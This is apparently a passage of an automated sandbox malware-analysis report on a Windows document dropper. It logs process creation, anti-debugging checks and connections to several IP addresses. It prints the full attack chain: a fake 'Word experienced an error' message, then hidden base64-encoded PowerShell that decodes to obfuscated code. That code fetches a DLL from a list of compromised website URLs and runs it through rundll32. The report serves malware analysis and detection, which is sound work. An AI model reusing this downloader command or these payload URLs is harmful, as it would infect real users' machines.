                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\Kaktksw\An6othh\N49I.dllJump to dropped file
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2508Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
                      Source: powershell.exe, 00000005.00000002.2097305734.00000000001A4000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00241D4D mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_005112C1 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00231D4D mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002D12C1 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E12C1 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001C12C1 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002212C1 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001812C1 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00711D4D mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_006A12C1 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00741D4D mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_007E12C1 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory protected: page write copy | page execute | page execute read | page execute and read and write | page guard

                      HIPS / PFW / Operating System Protection Evasion:

                      barindex
                      System process connects to network (likely due to code injection or exploit)Show sources
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 217.160.169.110 144
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 51.255.203.164 144
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 185.183.16.47 80
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 84.232.229.24 80
                      Encrypted powershell cmdline option foundShow sources
                      Source: unknownProcess created: Base64 decoded SET ("5"+"FTsG") ( [tYPE]("{1}{3}{0}{4}{2}" -F 'Io.','sy','Ory','stem.','dIrect')) ; $qE3R9= [TyPe]("{1}{0}{5}{4}{2}{3}"-f'Y','S','PoiNtmAn','AGEr','tEm.nET.SeRVIce','s') ;$Ko3ac63=$T82H + [char](33) + $P6_S;$I70Z=('Y5'+'0E'); (Get-iTEm ("v"+"a"+"RIABle:5"+"FtSg") ).ValUe::"Cr`EAtE`dire`ctorY"($HOME + ((('e2W'+'K'+'ak')+('tksw'+'e'+'2W')+('An6ot'+'h')+('he'+'2W')) -cREPLACe ('e'+'2W'),[CHAR]92));$W90X=('D'+('63'+'T')); (VarIABle Qe3R9 -vALuEOnl )::"S`EC`UrIt`Y`protoCOL" = ('Tl'+('s1'+'2'));$E32N=('J'+('96'+'C'));$Ue7v6em = (('N'+'49')+'I');$B31C=('A8'+'1J');$Qfx10xa=$HOME+(('{0}Ka'+'ktksw{'+'0'+'}'+'An'+'6othh{0}')-F [chaR]92)+$Ue7v6em+'.d' + 'll';$Y03E=('B3'+'3R');$K1iuxxp='h' + 'tt' + 'p';$Ta1ysp4=('ns'+' '+('wu d'+'b ')+('n'+'d:')+('/'+'/shan')+'n'+('ar'+'e')+'d'+('.com/co'+'n'+'te'+'n')+'t'+('/lh'+'A')+('Le'+'S')+('/!n'+'s')+(' wu '+'db')+(' n'+'d:')+'//'+('jee'+'van')+('lic.com/w'+'p-'+'co'+'n'+'te')+('nt'+'/')+('r'+'8M/!'+'ns')+(' '+'wu '+'db nd')+(':/'+'/d')+'as'+('h'+'ud')+('ance'+'.co')+('m/'+'th')+'in'+('kp'+'h'+'p/d')+'g'+'s'+('7J'+'m9')+'/'+('!n'+'s w')+('u d'+'b')+(' n'+'d:/'+'/')+('l'+'eo')+('par'+'dc')+('ran'+'es')+('.co'+'m/'+'zynq')+'-'+'l'+('i'+'nu'+'x'+'-yaay')+'f/'+('w'+'/!n')+'s '+('wu '+'db'+' ')+'n'+'d'+':'+'/'+('/mmrinc'+'s.')+('co'+'m'+'/eternal-')+('d'+'uel')+('i'+'st-')+('9cu'+'qv/j')+('x'+'GQj/!'+'n')+('s'+' w')+('u d'+'b nd'+':/')+('/3'+'mu'+'sk')+'et'+('eer'+'sent.ne'+'t/')+('w'+'p-in'+'cludes/TU'+'gD/!n'+'s ')+'wu'+' '+('d'+'b ')
                      Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded SET ("5"+"FTsG") ( [tYPE]("{1}{3}{0}{4}{2}" -F 'Io.','sy','Ory','stem.','dIrect')) ; $qE3R9= [TyPe]("{1}{0}{5}{4}{2}{3}"-f'Y','S','PoiNtmAn','AGEr','tEm.nET.SeRVIce','s') ;$Ko3ac63=$T82H + [char](33) + $P6_S;$I70Z=('Y5'+'0E'); (Get-iTEm ("v"+"a"+"RIABle:5"+"FtSg") ).ValUe::"Cr`EAtE`dire`ctorY"($HOME + ((('e2W'+'K'+'ak')+('tksw'+'e'+'2W')+('An6ot'+'h')+('he'+'2W')) -cREPLACe ('e'+'2W'),[CHAR]92));$W90X=('D'+('63'+'T')); (VarIABle Qe3R9 -vALuEOnl )::"S`EC`UrIt`Y`protoCOL" = ('Tl'+('s1'+'2'));$E32N=('J'+('96'+'C'));$Ue7v6em = (('N'+'49')+'I');$B31C=('A8'+'1J');$Qfx10xa=$HOME+(('{0}Ka'+'ktksw{'+'0'+'}'+'An'+'6othh{0}')-F [chaR]92)+$Ue7v6em+'.d' + 'll';$Y03E=('B3'+'3R');$K1iuxxp='h' + 'tt' + 'p';$Ta1ysp4=('ns'+' '+('wu d'+'b ')+('n'+'d:')+('/'+'/shan')+'n'+('ar'+'e')+'d'+('.com/co'+'n'+'te'+'n')+'t'+('/lh'+'A')+('Le'+'S')+('/!n'+'s')+(' wu '+'db')+(' n'+'d:')+'//'+('jee'+'van')+('lic.com/w'+'p-'+'co'+'n'+'te')+('nt'+'/')+('r'+'8M/!'+'ns')+(' '+'wu '+'db nd')+(':/'+'/d')+'as'+('h'+'ud')+('ance'+'.co')+('m/'+'th')+'in'+('kp'+'h'+'p/d')+'g'+'s'+('7J'+'m9')+'/'+('!n'+'s w')+('u d'+'b')+(' n'+'d:/'+'/')+('l'+'eo')+('par'+'dc')+('ran'+'es')+('.co'+'m/'+'zynq')+'-'+'l'+('i'+'nu'+'x'+'-yaay')+'f/'+('w'+'/!n')+'s '+('wu '+'db'+' ')+'n'+'d'+':'+'/'+('/mmrinc'+'s.')+('co'+'m'+'/eternal-')+('d'+'uel')+('i'+'st-')+('9cu'+'qv/j')+('x'+'GQj/!'+'n')+('s'+' w')+('u d'+'b nd'+':/')+('/3'+'mu'+'sk')+'et'+('eer'+'sent.ne'+'t/')+('w'+'p-in'+'cludes/TU'+'gD/!n'+'s ')+'wu'+' '+('d'+'b ')
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc UwBFAFQAIAAgACgAIgA1ACIAKwAiAEYAVABzAEcAIgApACAAKAAgAFsAdABZAFAARQBdACgAIgB7ADEAfQB7ADMAfQB7ADAAfQB7ADQAfQB7ADIAfQAiACAALQBGACAAJwBJAG8ALgAnACwAJwBzAHkAJwAsACcATwByAHkAJwAsACcAcwB0AGUAbQAuACcALAAnAGQASQByAGUAYwB0ACcAKQApACAAOwAgACAAJABxAEUAMwBSADkAPQAgACAAWwBUAHkAUABlAF0AKAAiAHsAMQB9AHsAMAB9AHsANQB9AHsANAB9AHsAMgB9AHsAMwB9ACIALQBmACcAWQAnACwAJwBTACcALAAnAFAAbwBpAE4AdABtAEEAbgAnACwAJwBBAEcARQByACcALAAnAHQARQBtAC4AbgBFAFQALgBTAGUAUgBWAEkAYwBlACcALAAnAHMAJwApACAAIAA7ACQASwBvADMAYQBjADYAMwA9ACQAVAA4ADIASAAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQAUAA2AF8AUwA7ACQASQA3ADAAWgA9ACgAJwBZADUAJwArACcAMABFACcAKQA7ACAAIAAoAEcAZQB0AC0AaQBUAEUAbQAgACAAKAAiAHYAIgArACIAYQAiACsAIgBSAEkAQQBCAGwAZQA6ADUAIgArACIARgB0AFMAZwAiACkAIAAgACkALgBWAGEAbABVAGUAOgA6ACIAQwByAGAARQBBAHQARQBgAGQAaQByAGUAYABjAHQAbwByAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAMgBXACcAKwAnAEsAJwArACcAYQBrACcAKQArACgAJwB0AGsAcwB3ACcAKwAnAGUAJwArACcAMgBXACcAKQArACgAJwBBAG4ANgBvAHQAJwArACcAaAAnACkAKwAoACcAaABlACcAKwAnADIAVwAnACkAKQAgACAALQBjAFIARQBQAEwAQQBDAGUAIAAoACcAZQAnACsAJwAyAFcAJwApACwAWwBDAEgAQQBSAF0AOQAyACkAKQA7ACQAVwA5ADAAWAA9ACgAJwBEACcAKwAoACcANgAzACcAKwAnAFQAJwApACkAOwAgACgAVgBhAHIASQBBAEIAbABlACAAUQBlADMAUgA5ACAALQB2AEEATAB1AEUATwBuAGwAIAAgACkAOgA6ACIAUwBgAEUAQwBgAFUAcgBJAHQAYABZAGAAcAByAG8AdABvAEMATwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABFADMAMgBOAD0AKAAnAEoAJwArACgAJwA5ADYAJwArACcAQwAnACkAKQA7ACQAVQBlADcAdgA2AGUAbQAgAD0AIAAoACgAJwBOACcAKwAnADQAOQAnACkAKwAnAEkAJwApADsAJABCADMAMQBDAD0AKAAnAEEAOAAnACsAJwAxAEoAJwApADsAJABRAGYAeAAxADAAeABhAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0ASwBhACcAKwAnAGsAdABrAHMAdwB7ACcAKwAnADAAJwArACcAfQAnACsAJwBBAG4AJwArACcANgBvAHQAaABoAHsAMAB9ACcAKQAtAEYAIABbAGMAaABhAFIAXQA5ADIAKQArACQAVQBlADcAdgA2AGUAbQArACcALgBkACcAIAArACAAJwBsAGwAJwA7ACQAWQAwADMARQA9ACgAJwBCADMAJwArACcAMwBSACcAKQA7ACQASwAxAGkAdQB4AHgAcAA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAFQAYQAxAHkAcwBwADQAPQAoACcAbgBzACcAKwAnACAAJwArACgAJwB3AHUAIABkACcAKwAnAGIAIAAnACkAKwAoACcAbgAnACsAJwBkADoAJwApACsAKAAnAC8AJwArACcALwBzAGgAYQBuACcAKQArACcAbgAnACsAKAAnAGEAcgAnACsAJwBlACcAKQArACcAZAAnACsAKAAnAC4AYwBvAG0ALwBjAG8AJwArACcAbgAnACsAJwB0AGUAJwArACcAbgAnACkAKwAnAHQAJwArACgAJwAvAGwAaAAnACsAJwBBACcAKQArACgAJwBMAGUAJwArACcAUwAnACkAKwAoACcALwAhAG4AJwArACcAcwAnACkAKwAoACcAIAB3AHUAIAAnACsAJwBkAGIAJwApACsAKAAnACAAbgAnACsAJwBkADoAJwApACsAJwAvAC8AJwArACgAJwBqAGUAZQAnACsAJwB2AGEAbgAnACkAKwAoACcAbABpAGMALgBjAG8AbQAvAHcAJwArACcAcAAtACcAKwAnAGMAbwAnACsAJwBuACcAKwAnAHQAZQAnACkAKwAoACcAbgB0ACcAKwAnAC8AJwApACsAKAAnAHIAJwArACcAOABNAC8AIQAnACsAJwBuAHMAJwApACsAKAAnACAAJwArACcAdwB1ACAAJwArACcAZABiACAAbgBkACcAKQArACgAJwA6AC8AJwArACcALwBkACcAKQArACcAYQBzACcAKwAoACcAaAAnACsAJwB1AGQAJwApACsAKAAnAGEAbgBjAGUAJwArACcALgBjAG8AJwApACsAKAAnAG0ALwAnACsAJwB0AGgAJwApACsAJwBpAG4AJwArACgAJwBrAHAAJwArACcAaAAnACsAJwBwAC8AZAAnACkAKwAnAGcAJwArACcAcwAnACsAKAAnADcASgAnACsAJwBtADkAJwApACsAJwAvACcAKwAoACcAIQBuACcAKwAnAHMAIAB3AC
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Kaktksw\An6othh\N49I.dll AnyString
                      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Kaktksw\An6othh\N49I.dll AnyString
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Kaktksw\An6othh\N49I.dll',#1
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Xsugi\zrfn.shd',FIxqgRZUp
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Xsugi\zrfn.shd',#1
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Omuzql\aridm.cve',PiBVmMpskdW
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Omuzql\aridm.cve',#1
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Yjyrclfl\qwodoyj.whn',CPVO
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Yjyrclfl\qwodoyj.whn',#1
                      Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc UwBFAFQAIAAgACgAIgA1ACIAKwAiAEYAVABzAEcAIgApACAAKAAgAFsAdABZAFAARQBdACgAIgB7ADEAfQB7ADMAfQB7ADAAfQB7ADQAfQB7ADIAfQAiACAALQBGACAAJwBJAG8ALgAnACwAJwBzAHkAJwAsACcATwByAHkAJwAsACcAcwB0AGUAbQAuACcALAAnAGQASQByAGUAYwB0ACcAKQApACAAOwAgACAAJABxAEUAMwBSADkAPQAgACAAWwBUAHkAUABlAF0AKAAiAHsAMQB9AHsAMAB9AHsANQB9AHsANAB9AHsAMgB9AHsAMwB9ACIALQBmACcAWQAnACwAJwBTACcALAAnAFAAbwBpAE4AdABtAEEAbgAnACwAJwBBAEcARQByACcALAAnAHQARQBtAC4AbgBFAFQALgBTAGUAUgBWAEkAYwBlACcALAAnAHMAJwApACAAIAA7ACQASwBvADMAYQBjADYAMwA9ACQAVAA4ADIASAAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQAUAA2AF8AUwA7ACQASQA3ADAAWgA9ACgAJwBZADUAJwArACcAMABFACcAKQA7ACAAIAAoAEcAZQB0AC0AaQBUAEUAbQAgACAAKAAiAHYAIgArACIAYQAiACsAIgBSAEkAQQBCAGwAZQA6ADUAIgArACIARgB0AFMAZwAiACkAIAAgACkALgBWAGEAbABVAGUAOgA6ACIAQwByAGAARQBBAHQARQBgAGQAaQByAGUAYABjAHQAbwByAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAMgBXACcAKwAnAEsAJwArACcAYQBrACcAKQArACgAJwB0AGsAcwB3ACcAKwAnAGUAJwArACcAMgBXACcAKQArACgAJwBBAG4ANgBvAHQAJwArACcAaAAnACkAKwAoACcAaABlACcAKwAnADIAVwAnACkAKQAgACAALQBjAFIARQBQAEwAQQBDAGUAIAAoACcAZQAnACsAJwAyAFcAJwApACwAWwBDAEgAQQBSAF0AOQAyACkAKQA7ACQAVwA5ADAAWAA9ACgAJwBEACcAKwAoACcANgAzACcAKwAnAFQAJwApACkAOwAgACgAVgBhAHIASQBBAEIAbABlACAAUQBlADMAUgA5ACAALQB2AEEATAB1AEUATwBuAGwAIAAgACkAOgA6ACIAUwBgAEUAQwBgAFUAcgBJAHQAYABZAGAAcAByAG8AdABvAEMATwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABFADMAMgBOAD0AKAAnAEoAJwArACgAJwA5ADYAJwArACcAQwAnACkAKQA7ACQAVQBlADcAdgA2AGUAbQAgAD0AIAAoACgAJwBOACcAKwAnADQAOQAnACkAKwAnAEkAJwApADsAJABCADMAMQBDAD0AKAAnAEEAOAAnACsAJwAxAEoAJwApADsAJABRAGYAeAAxADAAeABhAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0ASwBhACcAKwAnAGsAdABrAHMAdwB7ACcAKwAnADAAJwArACcAfQAnACsAJwBBAG4AJwArACcANgBvAHQAaABoAHsAMAB9ACcAKQAtAEYAIABbAGMAaABhAFIAXQA5ADIAKQArACQAVQBlADcAdgA2AGUAbQArACcALgBkACcAIAArACAAJwBsAGwAJwA7ACQAWQAwADMARQA9ACgAJwBCADMAJwArACcAMwBSACcAKQA7ACQASwAxAGkAdQB4AHgAcAA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAFQAYQAxAHkAcwBwADQAPQAoACcAbgBzACcAKwAnACAAJwArACgAJwB3AHUAIABkACcAKwAnAGIAIAAnACkAKwAoACcAbgAnACsAJwBkADoAJwApACsAKAAnAC8AJwArACcALwBzAGgAYQBuACcAKQArACcAbgAnACsAKAAnAGEAcgAnACsAJwBlACcAKQArACcAZAAnACsAKAAnAC4AYwBvAG0ALwBjAG8AJwArACcAbgAnACsAJwB0AGUAJwArACcAbgAnACkAKwAnAHQAJwArACgAJwAvAGwAaAAnACsAJwBBACcAKQArACgAJwBMAGUAJwArACcAUwAnACkAKwAoACcALwAhAG4AJwArACcAcwAnACkAKwAoACcAIAB3AHUAIAAnACsAJwBkAGIAJwApACsAKAAnACAAbgAnACsAJwBkADoAJwApACsAJwAvAC8AJwArACgAJwBqAGUAZQAnACsAJwB2AGEAbgAnACkAKwAoACcAbABpAGMALgBjAG8AbQAvAHcAJwArACcAcAAtACcAKwAnAGMAbwAnACsAJwBuACcAKwAnAHQAZQAnACkAKwAoACcAbgB0ACcAKwAnAC8AJwApACsAKAAnAHIAJwArACcAOABNAC8AIQAnACsAJwBuAHMAJwApACsAKAAnACAAJwArACcAdwB1ACAAJwArACcAZABiACAAbgBkACcAKQArACgAJwA6AC8AJwArACcALwBkACcAKQArACcAYQBzACcAKwAoACcAaAAnACsAJwB1AGQAJwApACsAKAAnAGEAbgBjAGUAJwArACcALgBjAG8AJwApACsAKAAnAG0ALwAnACsAJwB0AGgAJwApACsAJwBpAG4AJwArACgAJwBrAHAAJwArACcAaAAnACsAJwBwAC8AZAAnACkAKwAnAGcAJwArACcAcwAnACsA
                      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc UwBFAFQAIAAgACgAIgA1ACIAKwAiAEYAVABzAEcAIgApACAAKAAgAFsAdABZAFAARQBdACgAIgB7ADEAfQB7ADMAfQB7ADAAfQB7ADQAfQB7ADIAfQAiACAALQBGACAAJwBJAG8ALgAnACwAJwBzAHkAJwAsACcATwByAHkAJwAsACcAcwB0AGUAbQAuACcALAAnAGQASQByAGUAYwB0ACcAKQApACAAOwAgACAAJABxAEUAMwBSADkAPQAgACAAWwBUAHkAUABlAF0AKAAiAHsAMQB9AHsAMAB9AHsANQB9AHsANAB9AHsAMgB9AHsAMwB9ACIALQBmACcAWQAnACwAJwBTACcALAAnAFAAbwBpAE4AdABtAEEAbgAnACwAJwBBAEcARQByACcALAAnAHQARQBtAC4AbgBFAFQALgBTAGUAUgBWAEkAYwBlACcALAAnAHMAJwApACAAIAA7ACQASwBvADMAYQBjADYAMwA9ACQAVAA4ADIASAAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQAUAA2AF8AUwA7ACQASQA3ADAAWgA9ACgAJwBZADUAJwArACcAMABFACcAKQA7ACAAIAAoAEcAZQB0AC0AaQBUAEUAbQAgACAAKAAiAHYAIgArACIAYQAiACsAIgBSAEkAQQBCAGwAZQA6ADUAIgArACIARgB0AFMAZwAiACkAIAAgACkALgBWAGEAbABVAGUAOgA6ACIAQwByAGAARQBBAHQARQBgAGQAaQByAGUAYABjAHQAbwByAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAMgBXACcAKwAnAEsAJwArACcAYQBrACcAKQArACgAJwB0AGsAcwB3ACcAKwAnAGUAJwArACcAMgBXACcAKQArACgAJwBBAG4ANgBvAHQAJwArACcAaAAnACkAKwAoACcAaABlACcAKwAnADIAVwAnACkAKQAgACAALQBjAFIARQBQAEwAQQBDAGUAIAAoACcAZQAnACsAJwAyAFcAJwApACwAWwBDAEgAQQBSAF0AOQAyACkAKQA7ACQAVwA5ADAAWAA9ACgAJwBEACcAKwAoACcANgAzACcAKwAnAFQAJwApACkAOwAgACgAVgBhAHIASQBBAEIAbABlACAAUQBlADMAUgA5ACAALQB2AEEATAB1AEUATw